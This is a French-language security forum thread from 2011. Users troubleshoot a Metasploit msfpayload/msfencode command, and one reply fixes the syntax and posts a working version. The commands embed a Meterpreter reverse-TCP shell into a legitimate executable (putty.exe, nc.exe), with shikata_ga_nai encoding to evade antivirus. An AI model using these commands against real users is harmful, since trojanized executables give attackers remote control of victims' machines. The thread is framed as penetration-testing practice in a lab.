Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 06-01-2011 14:27:38

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Petite question sur Msfencode.

Bonjour,


J’essaye d’appliquer différents encodages et tester leurs réaction, mais ce que je ne suis pas arriver à faire c’est l’intégration d’un payload à un exécutable :

code:

[email protected]:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.131.131 lport=6100 R | ./msfencode -t exe -x/root/putty.exe -k -o /root/putty_test.exe -e x86/shikita_ga_nai -c 3

resultat:

[*] Error: the injection option must use a custom EXE template via -x, otherwise the injected payload will immediately exit when the main process dies.

Putty ce trouve effectivement sur le bureau, J’ai fais plusieurs tentatives en modifiant le code et en prenant soin de respecter les opérateurs, mais c’est toujours ‘’ –x putty.exe –k ‘’ qui pose problème. Et puis que signifie le point barre‘’ ./’’, je sais qu’il a un rapport avec le shell pour ne pas confondre l’interprétation des commandes, mais  j’ai vu dans plusieurs tutos qu’on pouvait l’utiliser alors que dans d’autres on ne l’utilise pas.

Cordialement.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 06-01-2011 14:53:54

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Petite question sur Msfencode.

Salut !

A mon avis c'est dû à une faute de frappe dans ta commande, surtout si ce que tu as copié ci-dessus est ta commande exacte wink Quelques corrections :
- il faut un espace entre le "-x" et le chemin de l'exécutable (si je ne mets pas d'espace, j'ai la même erreur que toi)
- l'encodage que tu veux utiliser s'appelle le shikata_ga_nai (grosso modo, ça veut dire "on ne peut rien y faire" en japonais), et pas shikita_ga_nai (on a mangé trop de bananes ? tongue)

J'ai testé (avec nc au lieu de putty) et chez moi je n'ai pas d'erreur, sur BT4-R2 :

./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.131.131 lport=6100 R | ./msfencode -t exe -x ~/nc.exe -k -o ~/test.exe -e x86/shikata_ga_nai -c 5

Bon, accessoirement il se fait incendier par mon antivirus mais ça c'est un autre problème big_smile
(au passage, la tilde ~ est un raccourci pour le dossier personnel, "/root/" dans le cas présent)

Pour l'histoire du "./", ça sert à indiquer que tu veux exécuter un programme qui se trouve dans le dossier courant. Si tu tapes juste le nom du programme, le système va le chercher dans les "endroits habituels" (ce qu'on appelle le PATH), et les 2 exécutables utilisés ici ne font pas partie du PATH par défaut (que tu peux afficher avec "echo $PATH").
Dans les tutos où le ./ n'est pas utilisé, c'est juste parce que l'auteur a ajouté le dossier /pentest/exploits/framework3 à son PATH, comme ça le système peut y chercher (et trouver) les programmes dont il a besoin smile

Hors Ligne

#3 07-01-2011 18:26:51

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Petite question sur Msfencode.

Shikita_ga_nai veut dire '' tu ne peux rien faire " lol:lol:
Merci pour la correction smile

Pour information, en essayant de comprendre pourquoi cet encodeur est tellement obsolète, je suis tombé sur un article fait par un certain Marc Baggett. Selon lui msfencode comporte un bug, je ne sais pas si cela à été corrigé dans les versions récentes, au lieu de faire un long récit, mieux vaut voir son blog.
http://www.indepthdefense.com/2008/12/m … s-cdi.html

Dernière modification par Fuji (08-01-2011 00:36:56)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
7 313 26-09-2016 15:52:41 par ElliotV
3 219 01-08-2016 15:53:54 par Olympe
11 709 05-03-2016 12:51:24 par Jéjé El Dipso
6 964 08-01-2016 19:58:40 par damsss
Question bête surement! par le flibustier
4 558 28-09-2015 19:38:05 par le flibustier

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.023 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]